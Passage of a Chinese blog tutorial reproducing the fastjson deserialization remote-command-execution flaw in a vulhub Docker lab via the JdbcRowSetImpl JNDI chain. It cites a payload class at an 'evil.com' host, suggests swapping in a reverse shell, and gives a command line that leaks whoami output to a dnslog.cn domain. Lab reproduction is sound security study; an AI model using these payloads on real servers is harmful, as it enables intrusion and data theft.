21 - vulhub - fastjson 反序列化导致任意命令执行漏洞

本文详细介绍了如何复现fastjson的反序列化导致的任意命令执行漏洞,包括使用docker-compose启动环境,通过JNDI注入执行命令,涉及Java 8u102的漏洞环境,利用com.sun.rowset.JdbcRowSetImpl的payload,以及在本地和远程服务器上模拟RMI服务器的过程。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

2.编译并启动环境

docker-compose up -d

3.查看环境运行状态

docker ps | grep rce


在这里插入图片描述


访问 8090 端口


在这里插入图片描述


[](

)漏洞利用

首先 vulhub 给出的复现提示如下

因为目标环境是Java 8u102,没有com.sun.jndi.rmi.object.trustURLCodebase的限制,

我们可以使用com.sun.rowset.JdbcRowSetImpl的利用链,借助JNDI注入来执行命令。

首先编译并上传命令执行代码,如http://evil.com/TouchFile.class:

[](

)编译 TouchFile.class 文件

这里就利用到了我们本地的 JAVA 环境,我们需要将下面的代码编译成一个 class 文件。

将下面的代码复制到一个文件,然后使用 javac 命令进行编译.

其中的 "touch", "/tmp/success" ,可以替换成自己的反弹shell或者其他命令执行语句,比如

String[] commands = {"/bin/sh","-c",“ping user.whoami.38v2ib.dnslog.cn”};


评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值